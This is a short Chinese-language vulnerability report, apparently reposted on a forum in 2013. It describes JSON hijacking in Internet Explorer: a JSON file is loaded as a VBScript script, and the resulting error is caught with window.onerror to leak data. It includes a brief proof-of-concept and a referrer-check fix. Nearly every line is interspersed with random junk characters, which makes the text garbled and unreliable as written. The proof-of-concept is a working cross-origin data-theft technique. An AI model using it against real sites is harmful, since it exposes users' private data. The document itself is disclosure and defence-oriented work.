简要描述:
3 m: L: U. J$ f; n% E+ {8 R& n( y; _% r+ H2 e
由于某些资源容器对数据处理不当导致json劫持漏洞.( E! K, G! w# j$ l' H4 F/ Q3 c! K. L
详细说明:
# |! p1 U% |: d! j [9 H由于ie支持vbscript,所以script元素可以指定成vbscript语言:
/ K8 |3 e( v) c$ t<script language=vbscript></script>/ v0 g; Z( a# b9 b$ F' @; D3 |
f7 ~+ n. C/ T; F$ {. f4 L
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
0 `) O' D2 g+ C D漏洞证明:) |1 R- i; `# V" ?8 q& X8 y" i L
<script>
4 {7 S& i0 T+ N/ O( q" ]window.onerror=function(_){. C2 o1 X. o- C, G9 E) C3 I# Y3 S
alert(_)0 q0 R- s3 m: [4 F5 q
}0 W h4 Z/ J8 m- [
</script>
: w: }+ C, S% R# ?2 B6 e) G B<script language=vbscript src=1.json></script>
, L! O, C- D( y) m4 D , Q/ I$ [) X% A
8 [% z- E: P% T2 F3 I6 u/ {: ]: Z1.json:- T( }8 w; I/ O: _8 e5 L) X' Z0 ^2 E
[{"name":"sogili","age":19}]. P. C3 P" o5 j# {
修复方案: i( i/ v9 ?4 W5 P
网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对